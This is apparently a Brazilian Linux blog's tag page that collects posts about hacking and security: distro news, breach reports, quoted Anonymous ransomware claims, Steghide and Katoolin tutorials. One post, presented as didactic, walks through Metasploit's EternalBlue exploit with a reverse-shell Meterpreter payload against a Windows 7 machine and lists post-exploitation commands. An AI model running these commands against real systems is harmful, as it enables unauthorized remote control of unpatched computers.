Diolinux - O modo Linux e Open Source de ver o Mundo

Responsive Ad Slot

Mostrando postagens com marcador hacker. Mostrar todas as postagens
Mostrando postagens com marcador hacker. Mostrar todas as postagens

Você conhece o Parrot Security OS?

Nenhum comentário

quinta-feira, 26 de setembro de 2019

Quando alguém pensa em “hackers” o Kali Linux logo vem a mente. Contudo, o mundo Linux é vasto e existem inúmeras alternativas e muitas de igual qualidade.

pentest-linux-parrot-security-os-cybersecurity-kali-hacker-segurança

O Parrot Security OS tem como foco a área de segurança, um dos vários setores de TI que exigem muito estudo, testes e superações. Projetado para pentest, análise forense em computadores, engenharia reversa, ataque, aplicações para ataques de palavras-chave, criptografia e muito mais. Possui um vasto e seleto conjunto de ferramentas, sendo também uma ótima solução ao trabalhar com criptomoedas.

Ao contrário do Kali Linux que utiliza por padrão o ambiente GNOME, o Parrot faz uso do MATE. Inclusive em seu site existe uma opção com KDE. O sistema é baseado em Debian e na última atualização disponibilizada, o Parrot Security 4.7, veio com muitas novidades.

pentest-linux-parrot-security-os-cybersecurity-kali-hacker-segurança-mate-kde

Alteração no domínio do site


Inicialmente a distro apenas tinha foco em pentest, com o passar do tempo o projeto amadureceu e se tornou mais geral. Houve assim uma necessidade de mudança de domínio, de parrotesec.org para parrotlinux.org, para melhor organização. 

Mudanças de repositório


A distribuição renomeou o seu repositório atual de “stable” para “rolling”, no cotidiano dos usuários que usam o sistema não influencia em nada. Com essa mudança, a proposta do Parrot fica mais distinguível, pois a equipe planeja lançar uma variação LTS (essa sim será a “stable”).

Melhorias no menu e adições de programas


O menu da interface do Parrot foi redesenhado, de modo a auxiliar e facilitar a busca pelos apps instalados. Além de novas ferramentas adicionadas para pentest, a equipe menciona que planeja aumentar ainda mais o leque de variedades. Nem todos os programas estão instalados no sistema, houve uma triagem e seleção de alguns pacotes, o resto está nos repositórios e cabe ao usuário ter a liberdade de montar seu próprio “arsenal”.

Sandbox no AppImage


Uma solução customizada do firejail + apparmor foi adicionada ao sistema, isso visa melhorar o recurso de sandbox no sistema. Tal medida foi devido ao número alto de reclamações por parte dos usuários, a implementação anterior do sandbox nos AppImages causaram alguns problemas.

Kernel Linux 5.2


Mesmo sendo baseado no Debian, que costuma ser bem conservador, os responsáveis pelo Parrot tentam oferecer as mais recentes versões do Linux em seu sistema.

Atualização do MATE


O Parrot 4.7 é fornecido com a versão mais recente do ambiente desktop MATE 1.22. Leve, rápido e econômico o MATE é uma escolha perfeita para quem deseja instalar em uma máquina antiga ou utilizar via “live cd”.

O sistema conta com mais novidades, um exemplo são as últimas versões do Firefox, entretanto não espere resultados surpreendentes em outras áreas, como jogos e afins. Bem segmentado, a distro é pensada para cybersecurity e não o usuário comum. 

Ficou interessado no Parrot Security OS? Efetue o download diretamente em seu site oficial.

Faça parte de nosso fórum Diolinux Plus, até o próximo post “hackudão”, SISTEMATICAMENTE! 😎

Fonte: Parrot.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.

Como Acessar o Windows pelo Linux com Metasploit

Nenhum comentário

terça-feira, 23 de abril de 2019

O Metasploit é uma ferramenta usada por pentesters para avaliar as capacidade de segurança de um sistema, fazer invasões e também detectar intrusos. É uma ferramenta muito comum em distribuições Linux voltadas para este meio, como o Kali Linux. Hoje você vai conhecer uma de suas facetas. 

Metasploit







Metasploit é um projeto de segurança da informação que fornece informações sobre vulnerabilidades de segurança e ajuda nos testes de penetração. É de propriedade da empresa de segurança Rapid7, de Boston, Massachusetts, que possui diversos softwares (Opcode - Banco de Dados ; e o Shellcode , que executa comandos de Shell Script... ), entre eles o mais conhecido é o Metasploit Framework, um software de código aberto para explorar falhas de uma máquina remota.

O Metasploit possui 6 tipos de módulos (auxiliaryexploitpayloadpostencoder e nop) . No vídeo apresentado por nós, vamos utilizar o Meterpreter que é um payload avançado.

Instalação


Existem diversas maneiras de você instalar o Metasploit Framework. Baixando diretamente pelo site  ou pelo GitHub

Para quem gosta de fazer manualmente, é possível instalá-lo via gerenciador de pacotes da sua distribuição, por exemplo, na distribuição Ubuntu, Linux Mint, Debian e derivados basta realizar os comandos abaixo:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
sudo ./msfinstall
msfdb init


E pronto, o Metasploit está pronto para uso! 

Lembrando que em algumas distribuições já possuem o Metasploit instalado por padrão, como o Pentoo e o Kali Linux, entre  outras criadas especialmente para testes de invasão.

O Próximo passo é rodar o Metasploit por este comando:

msfconsole

Isso irá abrir o framework, e em seguida usaremos o Meterpreter para acessar o Windows , basta rodar os comandos abaixo na ordem:


use exploit/windows/smb/ms17_010_eternalblue
set RHOST NÚMERO_IP_DA_MÁQUINA_WINDOWS
set payload windows/x64/meterpreter/reverse_tcp
set LHOST NÚMERO_IP_DA_SUA_MÁQUINA
set encoder generic/none
exploit


Lembrando que esses comandos são "a grosso modo", e servem para Windows 7 Service Pack 1 , para outras versões assista o vídeo com link abaixo que há mais detalhes para variados casos.

Após acessar você pode obter informações detalhadas do sistema com o comando sysinfo; tirar um print da tela com o comando screenshot ; saber qual diretório você está com o comando pwd a saída será algo do tipo *c:32* ; desligar, reiniciar,... entre vários  comandos  que podem ser  consultados  pelo comando help .

Confira o exemplo no vídeo:



Esse artigo e o vídeo apresentado foram criados com finalidade didática, mantenha o seu Windows atualizado para evitar ser exposto a coisas do tipo. A falha explorada neste exemplo, por exemplo, já foi corrigida pela Microsoft, daí a importância de manter os sistemas sempre atualizados.

Se você ainda não domina Shell Script e o Terminal Linux. Aproveite uma promoção onde você pode adquirir 5 cursos de terminal Linux, incluindo Shell Script, Expressões Regulares, Vim e Sed. 

Clicando nesse link http://bit.ly/Promo5pg para adquirir com o PagSeguro ou nesse link http://bit.ly/5CursosLinux para adquirir com o PayPal. Se quiser mais detalhes da promoção veja essa postagem: 5 Cursos do Terminal Linux para você !

Esse artigo foi escrito em parceria com a galera do Terminal Root, os quais são os autores dos cursos mencionados acima, até a próxima!_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Hackers invadem e acessam e-mails do Outlook

Nenhum comentário

terça-feira, 16 de abril de 2019

Nesta sexta-feira (12), a Microsoft enviou alguns e-mails para usuários do Outlook, informando que o serviço sofreu um ataque hacker, contendo dados como: endereços de e-mails, nomes de pastas e linhas de assuntos de mensagens foram acessadas por tais invasores (ou invasor, até o momento a MS desconhece se o ato foi obra de um grupo ou apenas um criminoso).

outlook-ms-microsoft-hacker-email-invadido

No dia 14, domingo, o site Motherboard revelou que a Microsoft enviou outra notificação para cerca de 6% das contas do Outlook.com que foram afetadas. Possivelmente o conteúdo dos e-mails também foram vistos, e a MS depois de minimizar a situação na primeira notificação, só admitiu o real problema, depois da apresentação de evidências desta violação.

Estima-se que os criminosos tiveram acesso não-autorizado a essas contas de e-mails entre 1º de Janeiro de 2018 à Março de 2019.

O porta voz da Microsoft, em um comunicado ao site The Verge, afirmou que essa “alegação de 6 meses é imprecisa”, referindo-se ao tempo dessas contas nas mãos dos cibercriminosos. A Microsoft esclareceu que a maior parte das contas afetadas foram notificadas e instruídas de como proceder.

Algumas vítimas tiveram senhas redefinidas no iCloud ligadas a iPhones roubados. Tudo indica que esse era o real motivo da invasão.

Como isso ocorreu?


Os hackers ou hacker, em primeiro caso, invadiu uma conta do suporte ao cliente da MS, como essa conta tinha altos poderes administrativos, o segundo movimento foi obter acesso a informações relacionadas às contas de e-mails dos clientes.

Minimização dos fatos e admissão do ocorrido


Inicialmente a Microsoft negou o caso, após confirmação por meio de evidências a mesma minimizou alegando que o conteúdo de seus e-mails não poderiam ser visualizados por invasores. Com novas evidências trazidas pelo site Motherboard, a MS tomou medidas cabíveis e notificou pela segunda vez os usuários que foram afetados pelo ocorrido.

Apenas contas de usuários comuns foram afetadas, as corporativas não sofreram por contar com um nível a mais de segurança.

Em um e-mail para os usuários afetados, a MS fez a seguinte observação que:

"Lamenta qualquer inconveniente causado por este problema" e deve ter "a certeza de que a Microsoft leva muito a sério a proteção de dados e envolveu suas equipes internas de segurança e privacidade na investigação e resolução do" problema ", bem como o fortalecimento adicional de sistemas e processos para prevenir tal recorrência".

A Microsoft informou que desativou imediatamente a conta de suporte afetada, ao tomar conhecimento do problema. Uma auditoria de contas de atendimento ao cliente serão realizadas, para garantir que casos como esse não se repitam.

União Europeia e as possíveis consequências


Sem informar o número de pessoas afetadas, é bem plausível que alguns destes usuários estavam na União Europeia, e que embora a violação dos dados seja um problema para a Microsoft, essa violação de dados está dentro do escopo do Regulamento Geral de Proteção de Dados da UE. É provável que uma investigação da UE contra a Microsoft esteja em andamento, averiguando se a “gigante de Redmond” fez o possível para impedir o ataque.

A Microsoft recomenda que você altere suas senhas, e mesmo que não esteja entre os afetados, essa ação é de extrema importância.

Outro ponto que quero salientar, é para além de uma senha forte, com caracteres especiais, números etc. Que ela não seja uma única senha, e um procedimento como o de ativar a verificação de 2 passos (duas etapas), deve sempre estar ativo.

Compreendo que empresas tendem a minimizar o ocorrido, seja para não causar uma “histeria coletiva” ou não “queimar sua imagem”, porém 3 meses é um tempo relativamente significativo, então averigue sua conta (caso possua Outlook/Hotmail) e troque todas suas senhas.

A era da modernidade tem dessas (😁😁😁) deixe suas opiniões em nosso fórum Diolinux Plus, e continue a discussão sobre o tema.

Te espero aqui no blog Diolinux, até o próximo post, SISTEMATICAMENTE! 😎
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.


Não seja uma vítima do Facebook

Nenhum comentário

segunda-feira, 27 de março de 2017

Quero compartilhar com você um texto meu que foi publicado no jornal local da minha cidade. Eu escrevi ele para tentar alertar as pessoas sobre brechas de segurança que podem existir no Facebook que independem de alguém conseguir hackear a sua conta.




Antes de ver o texto, você pode conferir o meu vídeo sobre o assunto, acho especialmente importante compartilhar essas informações com quem não tem muito conhecimento técnico, não sei, quem sabe sua mãe, seu pai, tia, etc, qualquer ente querido que você não quer ver passando apuros por conta de algo como o Facebook.



Agora fique com o texto na íntegra:

A rede social de Mark Zuckerberg, o Facebook, é algo comum na vida de bilhões (literalmente) de pessoas ao redor do mundo, mas como tudo que se torna muito popular, sobretudo no aspecto tecnológico, ele também pode ser utilizado para fins ilícitos e criminosos.
Eu quero te dar algumas dicas que podem parecer simples, talvez por ser algo simples é que seja fácil constatar algumas coisas que as pessoas simplesmente negligenciam em suas redes sociais, e que quando aplicadas, fazem da sua vida social digital muito mais tranquila. Vamos lá?

Use senhas difíceis: Colocar a sua data de aniversário, do seu filho, o nome do seu animal de estimação ou palavras encontradas em um dicionário é algo que você deve evitar, alguém que quer acessar os seus dados vai testar essas coisas em primeiro lugar, evite usar senhas fáceis nos Smartphones também, as senhas de bloqueio devem ter um certo nível de complexidade para fuja da obviedade, afinal, tirando a tela de bloqueio, não há nada que impeça que uma pessoa qualquer abra o seu App do Facebook com apenas um toque e “faça a festa”.

A sua vida pessoal é um livro aberto na internet? Você adora fazer check-in onde quer que você vá? Adora dizer o quanto você está feliz por ter ido viajar para o lugar dos seus sonhos? Bom, você deveria tomar mais cuidado com isso, pois ao mesmo tempo que você está contando para os seus amigos as coisas boas que acontecem na sua vida, você pode também estar contando as mesmas coisas para pessoas não tão bem-intencionadas. Em época de férias, dizer que você vai viajar por muitos dias ou postar fotos longe de casa ou fazer check-in, além de indicar que você vai se divertir muito, também indica que a sua residência está vazia, o que pode ser um prato cheio para criminosos.

Evite identificar os hábitos da sua família das redes sociais e preste atenção para não passar informações de forma involuntária, você pode acabar contanto através de fotos, check-ins e posts onde os seus filhos estudam ou fazem alguma atividade extracurricular; onde você trabalha e quais os horários que vocês estão ou não em casa.

Outro detalhe muito importante que você deve prestar atenção na hora de usar o Facebook (o Facebook aqui é o exemplo, mas serve para qualquer site) são os vírus de computador. Duvide de promoções miraculosas, ninguém sorteia um iPhone simplesmente por você ser o visitante número 10 mil de algum site, não cadastre seu cartão de crédito em qualquer lugar para ganhar uma recompensa, não acesse sites de conteúdo duvidoso e acima de tudo, informe as pessoas que compartilham o computador com você para que elas não caiam nestas armadilhas, pois uma vez que o computador esteja infectado, a próxima pessoa que utilizá-lo estará suscetível a estes problemas.

Se você utilizar o computador para tarefas simples, como usar a internet, editar documentos e planilhas, ouvir músicas, jogar e coisas do tipo, algo que você pode fazer para aumentar a sua segurança e a da sua família e substituir o sistema operacional Windows pelo Linux, um sistema mais robusto e resistente a vírus, da próxima vez que você for formatar o seu computador, peça para o técnico instalar Linux na sua máquina, assim você poderá acessar a sua conta bancária sem medo, além de não precisar se preocupar com vírus de computador.

Para fins gerais, você deveria gastar um tempo analisando as configurações de privacidade do seu perfil no Facebook para saber quem são as pessoas que podem acessar as suas informações. 

Que tal deixar para postar as fotos da viagem depois que você voltar? Você vai se divertir da mesma forma e não vai abrir margem para problemas. Aproveite o que a internet tem de melhor sem correr riscos!

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.





Donald Trump quer criar um "exército" de hackers

Nenhum comentário

terça-feira, 13 de dezembro de 2016

O novo presidente dos EUA ainda nem tomou a posse oficial e já está "causando" com o seu comportamento "um pouco excêntrico”, Trump já está anunciando muitas mudanças relacionadas à segurança, entre elas, a Cyber Security.

Donald Trump Hackers






A segurança cibernética não era algo publicamente tão falado pelo governo dos Estados Unidos, a não ser quando ele se envolvia-se em algum escândalo relacionada a espionagem, pois afinal, ninguém sai falando sobre suas estratégias de defesas e procedimentos por aí simplesmente por falar, mas Donald Trump anunciou após reunião com um comitê de especialistas que incluem Keith Alexander, ex-diretor da NSA e Ajay Banga, ex-CEO da MasterCard que em seu governo está pensando em contratar 100 hackers para cuidar da segurança cibernética dos EUA.

Sabemos que se tratando dos EUA, esse exército de hackers não serão utilizados somente para questões de segurança do país, porém o novo governo pode acabar tendo algumas dificuldades com o recrutamento desse pessoal, pois a grande maioria dos “bons hackers” já estão empregados por grandes empresas com salários altíssimos, sendo difícil o governo competir com esse valor. Se você havia se interessado nessa vaga, avisamos que por questões de segurança, só serão contratados norte americanos.

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Steghide - Usando esteganografia para esconder informações em imagens no Ubuntu

Nenhum comentário

segunda-feira, 12 de setembro de 2016

Assuntos mais avançados como este não são abordados aqui no blog normalmente, mas por conta de alguns pedidos eu resolvi mostrar uma ferramenta muito interessante que permite que você troque informações com o seu amigo ou amiga de uma forma sigilosa e praticamente indetectável por leigos.

Steghide no Ubuntu




Bom, acho que antes de mais nada vai aqui uma definição do que é esteganografia:
Esteganografia  é uma palavra que vem do grego e quer dizer algo como "escrita escondida", desta é forma é basicamente o estudo de formas ou técnicas para ocultar informações dentro de outras mensagens.
Basicamente o que vamos ver aqui é uma das versões digitais da esteganografia, ou seja, vamos esconder um arquivo de texto dentro de uma imagem , se você quiser ler algo mais abrangente sobre o assunto um lugar legal é a própria Wikipédia e as fontes do artigo da mesma, vai de dar uma noção mais ampla do que é esteganografia.

Este tutorial usará o Ubuntu como base, de modo que o único passo realmente diferente para outras distros que não sejam derivadas será o de instalar o Steghide, para isso consulte a documentação do seu sistema.

Como instalar o Steghide no Ubuntu


Já que a gente vai brincar de "hacker de padaria" vamos usar o terminal para instalar o programa:
sudo apt-get install steghide
O Steghide está no repositório do sistema então é só isso mesmo, depois de instalado, ainda no terminal, você pode verificar todos os parâmetros e principais recursos do programa digitando:
steghide --help
Como neste exemplo:

Steghide no Ubuntu

Só isso já te dará a ideia dos parâmetros e como você pode utilizá-lo, mas vamos dar um exemplo.

Usando o Steghide para esconder um arquivo de texto dentro de uma imagem


Muito bem, antes de fazermos o procedimento precisamos de alguns arquivos, uma imagem no formato jpg, um arquivo de texto .txt com uma "mensagem secreta" dentro com ambos dentro do mesmo diretório, só para facilitar um pouco as coisas.

Steghide

Como você pode observar, eu tenho os seguintes itens:

- Uma imagem chamada "everest.jpg", que nada mais é do que um wallpaper para Smartphone.

- Um arquivo de texto chamado "diolinux.txt" que contém a mensagem "youtube.com/Diolinux".

O que vamos fazer é inserir este arquivo "diolinux.txt" dentro da imagem "everest.jpg"

Steghide no terminal


O primeiro passo é navegar até a pasta que você colocou seu arquivos, se você colocou eles na home como eu, basicamente você precisa abrir o terminal, a localização padrão dele é na própria home. Dê um comando ls para garantir que os arquivos estejam mesmo na pasta. Caso contrário navegue até a pasta desejada usando o comando cd.

comando ls

Agora vamos esconder a mensagem usando o seguinte modelo:
steghide embed -ef mensagem.txt -cf imagemoriginal.jpg -sf novaimagemcomtextoescondido.jpg
Veja o exemplo:

Exemplo

Note que depois de digitar o comando será necessário informar uma "passphrase", ou seja, uma senha para o arquivo, esta não necessariamente precisa ser a sua senha de administrador do sistema, pode ser qualquer outra coisa, ela vai ajudar a deixar o arquivo ainda mais seguro, pois mesmo que alguma pessoa identifique a imagem esteganografada, sem esta senha ela não terá acesso direto ao conteúdo da mensagem. É necessário digitar duas vezes a mesma senha.

Note também que o terminal indicou a criação de um arquivo "novaimagem.jpg", ela só tem este nome porque eu defini isso no comando anterior, você pode colocar o que bem entender. A imagem esta no mesmo diretório dos arquivos originais e ela é idêntica à imagem original também, exceto pelo espaço que ocupa em disco.


Dica: Ao enviar a imagem que contém a mensagem escondida para alguém, evite enviar diretamente pelo Facebook ou outro serviço que comprima a imagem, isso vai fazer com que ela perca as propriedades do arquivo que adicionamos a ela, ao invés disso, envie através de um arquivo compactado, assim você garante a integridade.

Como extrair as informações de uma imagem esteganografada


De nada adianta esconder os dados se você não conseguir revelá-los depois, não é? Bom, o procedimento para revelar as informações de uma imagem esteganografada é semelhante ao de esconder, vamos ao exemplo:
steghide extract -sf imagemsteganografada.jpg -xf arquivoextraido.txt
Seguindo o exemplo que eu dei seria:
steghide extract -sf novaimagemcomtextoescondido.jpg  -xf arquivoextraido.txt
Sendo que "arquivoextraido.txt" é o nome do arquivo com a mensagem oculta que você revelou, você pode dar o nome que quiser pra ele, este foi apenas um exemplo. Será necessário também digitar a senha que você inseriu na hora da criação da imagem, caso contrário o conteúdo não será extraído, logo, certifique-se da dar acesso à senha para a pessoa que você quer que seja capaz de ler a mensagem escondida.

Sobre os parâmetros do Steghide


Como eu comentei anteriormente, você pode consultar a opção "--help" do Steghide para ver todas as opções, mas vou descrever aqui as opções utilizadas nos exemplos anteriores:

-ef : Indica o arquivo de imagem onde a mensagem será imbutida

-cf : Indica o arquivo que será camuflado

-sf  : Indica o nome do novo arquivo criado como uma imagem esteganografada, caso você não especifique um novo arquivo com este parâmetro, o Steghide vai ocultar os dados na própria imagem original.

-xf : Este parâmetro indica a criação de um novo arquivo onde os dados extraídos serão jogados, usamos ele no comando de extração.

Interessante não é? Agora que você aprendeu um truque novo, que tal compartilhar para mostrar para mais pessoas? Faça um bom uso e até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Você é usuário do Opera? As suas senhas podem ter sido roubadas

Nenhum comentário

terça-feira, 30 de agosto de 2016

Os desenvolvedores do Opera Browser anunciaram que detectaram vestígios de um ataque em seus servidores que podem ter comprometido a função de sincronização do navegador, OperaSync, desta forma os usuários podem ter sido expostos e recomendação é mudar as senhas.

Opera Browser




Segundos os desenvolvedores, o ataque foi bloqueado rapidamente, porém, usuários do OperaSync, o recurso do navegador que permite sincronizar dados entre dispositivos, assim como o Sync do Firefox e do Chrome, podem ter tido seus dados comprometidos. Quando um usuário sincroniza seus dados, normalmente acaba levando seu histórico de navegação e senhas salvas em sites, além de favoritos e configurações personalizadas do navegador.

Não há grande motivos para pânico, segundo a companhia, mas a recomendação é que se você usa o OperSync, altere a sua senha, e aqui sempre cabe aquelas dicas básicas de segurança em senhas:

- Use uma senha longa, no mínimo 8 caracteres.
- Use caracteres especiais.
- Use números.
- Use letras maiúsculas e minusculas.

É sempre muito bom tomar estes cuidados, independente de onde você vá utilizar as senhas. Para saber mais sobre a invasão consulte o blog do Opera.

Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Depois de Anatel, Anonymous invade o Ministério Público

Nenhum comentário

terça-feira, 5 de julho de 2016

Na semana passada nós comentamos o caso no AnonymousBR ter "sequestrado" alguns computadores da Anatel através de um Ransomware, desta vez o alvo é o Ministério Público.




Da mesma forma como que ocorreu na invasão da Anatel, o anúncio do ataque ao Ministério Público foi feito na página do Facebook do AnonymousBR, onde eles publicaram o seguinte:

"Então... Pensaram que foi só a Anatel?

Recentemente tivemos acesso a mais de 1 mil e-mails do Ministério Público do Mato Grosso do Sul.

Durante o tempo que tivemos esses acessos, conseguimos capturar quase 20Gb de informações sigilosas.

O material está sendo analisado e será divulgado em breve por WikiLeaks.

Além disso, diversos computadores do MP-MS também foram criptografados. Seus servidores de intranet e webmail ainda estão completamente fora do ar. Somente Anonymous possui as senhas.

Nós denunciamos e repudiamos a ação paramilitar realizada por fazendeiros contra famílias dos povos originários que ocorre há anos na região.

O Ministério da Justiça, principal responsável da paralisação das demarcações, mais uma vez, omitiu-se das suas responsabilidades de zelar pelos direitos indígenas.

Nós não.

Anonymous"

Qual é a sua opinião sobre as ações do Anonyous no Brasil?
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Anonymous sequestra computadores da Anatel

Nenhum comentário

sexta-feira, 1 de julho de 2016

O grupo hacktivista, AnonymousBR, publicou em sua página no Facebook que está com a posse de vários computadores da Anatel, "sequestrados" através de um ransomware. Saiba mais:

AnonymoysBR Anatel




Segundo nota na fanpage do grupo, o Anonymous invadiu os computadores da Anatel e implantou um ransomware. Este tipo de ataque ficou popular nos últimos anos na internet, onde o atacante implanta um tipo de malware (o ransomware) que criptografa os dados do computador da vítima e só um libera mediante a alguma condição, normalmente dinheiro, normalmente pago em bitcoin, porém, é bem esse o caso da Anatel.

Leia a nota publicada pelo Anonymos na íntegra:

"Saudações, legião.

Foda-se a Anatel.

Depois de ter o site derrubado por uma semana...

Depois de hackear a base de dados da agência...

Depois de sofrer #exposed de toda a diretoria e gerencia...

Depois de flagrarmos funcionários da Anatel frequentando sites de traição...

Eis que hoje, dia 1 de julho de 2016, inauguramos uma nova fase nas ações hackativistas pela liberdade da informação no Brasil.

Há algumas horas, diversos computadores da Anatel previamente identificados como alvos estratégicos por Anonymous sofreram um ataque de Ransomware, cujo objetivo é cobrar da agência uma posição firme, imutável e permanente sobre o fim da franquia de dados na internet fixa.

Para quem não sabe, Ransomware é um tipo de "vírus" que sequestra e criptografa totalmente o PC da vítima, exigindo uma senha para desbloqueá-lo. Não há nenhuma maneira conhecida, até hoje, para quebrar essa senha.

Nos últimos anos, os ataques de Ransomware foram utilizados para fins lucrativos. Crackers enviavam o vírus para empresas e grandes corporações, exigindo um valor de resgate para a senha que desbloqueia seus arquivos.

No entanto, como nós somos uma ideia que luta por justiça, e não por dinheiro, estamos exigindo que a Anatel tome uma atitude e proíba de forma definitiva o limite de franquia para a internet fixa, desejo das grandes operadoras.

Nós temos a senha para a libertação dos PCs infectados da Anatel, e a tornaremos pública somente após essa questão ser devidamente resolvida, e que a internet fixa no Brasil seja verdadeiramente livre e ilimitada.

Nós somos Anonymous.

Nós não perdoamos.

Esperem por nós."

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Hackers conseguem invadir WhatsApp e Telegram sem quebrar a criptografia dos Apps

Nenhum comentário

domingo, 5 de junho de 2016

Quem imagina que é necessário quebrar a criptografia das mensagens do WhatsApp para acessar conversas alheias está enganado. O canal do YouTube Thomas Fox-Brewster demonstra como é feito o ataque em poucos minutos.

Thomas Fox-Brewster






Ao invés de atacar os aplicativos diretamente, o ataque direcionou seu esforços para quebrar os protocolos de segurança do Signaling System 7, uma rede gerenciada normalmente pelas empresas de telefonia que conecta os celulares e Smartphones e funciona como se fosse um Hub central, de modo que as únicas entidades que tem acesso a isso normalmente, sejam as operadores e os governos.
Apesar deles não explicarem e nem darem detalhes do que estão fazendo nos vídeos, é claramente perceptível como o invasor consegue controlar as contas das vítimas, tanto no WhatsApp, quanto no Telegram.

Ataque ao WhatsApp


Ataque ao Telegram



De nada adianta as empresas investirem tanto na segurança de seus produtos se a rede em que os Smartphones se conectam tem falhas  e permitem ataques desta forma.
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




TeamViewer é alvo de ataques e alguns usuários foram infectados

Nenhum comentário

quinta-feira, 2 de junho de 2016

O popular software de acesso remoto, TeamViewer, sofreu ataques hackers que fizeram com que o serviço fosse utilizado para fins criminosos, como roubar senhas bancárias e dados dos usuários, a empresa notificou aos clientes ontem pelo Twitter, pedindo desculpas pelas falhas no serviço.

TeamViewer é vitima de ataques




Vários usuários tem relatado problemas de segurança com o TeamViewer, para completar, o site da empresa foi tirado do ar ontem. Segundo a mesma, o motivo foi manutenção no servidor, mas o fato é que várias pessoas alegaram que através do TeamViewer, observando os logs do sistema, alguns computadores e até mesmo servidores foram acessados em horários fora do período tradicional de trabalho e, segundo os relatos, contas bancárias e contas de PayPal foram saqueadas.

Outros computadores tiveram a implantação de ransomware, um tipo de vírus de computador que "sequestra" arquivos, criptografando-os e liberando os mesmos somente via pagamento, normalmente em Bitcoin.


Para se proteger contra hackers, a TeamViewer recomenda que os usuários instalem autenticação de dois fatores, o que acrescenta uma camada adicional de proteção. 

Alguns usuários que usam autenticação de dois fatores ainda têm experimentado logins mal-intencionados. Outras dicas incluem o uso de senhas únicas para TeamViewer e usando uma combinação de letras maiúsculas e minúsculas, números e símbolos. A empresa desculpou-se através do Twitter pelos ocorridos. Aparentemente, tudo está correto agora, mas vale a pena você ficar de olho aberto, especialmente se você usa Windows na máquina com TeamViewer.

_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Como instalar as ferramentas do Kali Linux no Ubuntu com o Katoolin

Nenhum comentário

terça-feira, 31 de maio de 2016

Katoolin é um script que permite que você instale facilmente as ferramentas de PenTest da famosa distribuição Kali Linux no Ubuntu. Veja como funciona.





A dica é útil para quem quer transformar o sistema operacional Ubuntu em uma ferramenta de testes de segurança sem a necessidade de reinstalar o sistema, fazer dual boot ou usar máquinas virtuais com o Kali Linux ou qualquer outras distro com essa finalidade.
Leia também: Top 7 melhores distros para PenTest
O script Katoolin tem basicamente 3 funções:

- Adicionar os repositórios do Kali Linux.
- Remover os repositórios do Kali Linux.
- Instalar as ferramentas do Kali Linux.

Como estamos falando de ferramentas para profissionais e estudantes de segurança de redes de computadores não vamos poupar o terminal desta vez, como fazemos nos tutoriais para iniciantes aqui do blog, então, vamos aprender a rodar este script e instalar tudo o que você precisa para fazer os seus testes de segurança.

Instalando ferramentas do Kali Linux no Ubuntu com Katoolin


Como pré-requisitos temos que ter o Python 2.7 instalado no computador, ou uma versão superior, os desenvolvedores informaram que o único sistema onde a ferramenta foi testada foi o Ubuntu, porém, o Katoolin deve funcionar em outros derivados do sistema da Canonical possivelmente.
sudo su
git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py /usr/bin/katoolin
chmod +x /usr/bin/katoolin
sudo katoolin
Rodando o script você basicamente deve selecionar o que você deseja utilizar. Temos aqui um vídeo exemplificando o funcionamento:


Alerta: Os desenvolvedores pedem para que você remova o repositório do Kali Linux depois da instalação das ferramentas para evitar problemas, ou que pelo menos você o desabilite temporariamente até querer fazer alguma atualização das mesmas. Você pode usar o próprio Katoolin para isso.

Se você estiver em dúvida sobre o funcionamento, faça o teste em uma máquina virtual primeiramente antes de colocar no seu computador de trabalho.
GitHub do Katoolin
Até a próxima!
_____________________________________________________________________________
Viu algum erro ou gostaria de adicionar alguma sugestão a essa matéria? Colabore, clique aqui.




Microsoft, Google, Facebook e outras empresas entraram com ações na justiça para ajudar a Apple

Nenhum comentário

sexta-feira, 26 de fevereiro de 2016

Recentemente uma notícia envolvendo a Apple e o FBI correu o mundo da tecnologia e parece que o caso ainda está longe de terminar, porém, agora outras gigantes do setor resolveram posicionar-se sobre o tema e ajudar a empresa de Cupertino.

Apple recebe ajuda de outras gigantes da tecnologia




O FBI, com a ajuda do judicial norte-americano, está querendo fazer com que a Apple entregue uma espécie de "chave mestra" para hackear os iPhones da empresa sob o pretexto de utilizar a ferramenta para resolver um caso que está rolando nos tribunais atualmente, você pode saber mais sobre o caso clicando aqui.

Tim Cook, CEO da Apple, recusou-se a fazer isso e insinuou que a única maneira disso acontecer seria através de uma ordem judicial irrevogável, a justificativa está em não deixar nas mãos do Governo (e sabe-se lá de quem mais) a possibilidade de bisbilhotar os iPhones de milhões de usuários.

A afirmação é que isso seria uma quebra enorme do contrato de confiança entre os usuários e a Apple, apesar das "boas intenções" (fiquei na dúvida se colocava aspas nesta parte...) do FBI, isso abriria precedentes que para outras empresas de tecnologia fossem intimadas a quebrar suas criptografias por meio de uma ação judicial, dando a terceiros o controle dos produtos sem autorização dos usuários.

A "treta" foi tão grande que até o fundador do antivírus McAfee, o "hacker malucão", John McAfee disse que hackearia o iPhone para o FBI para que a Apple não precisasse entregar o iOS de bandeja na mão das entidades governamentais e de justiça do EUA.

O novo capítulo


Como a decisão judicial sob a Apple pode acabar afetando futuramente outras empresas, algumas das principais companhias do Vale do Silício decidiram juntar-se à causa.  A primeira foi a Microsoft que já fez um declaração oficial para a justiça em apoio à Apple, nas próximas semanas, Google, Facebook, Amazon e Twitter deverão fazer o mesmo juntamente com outras empresas menores.

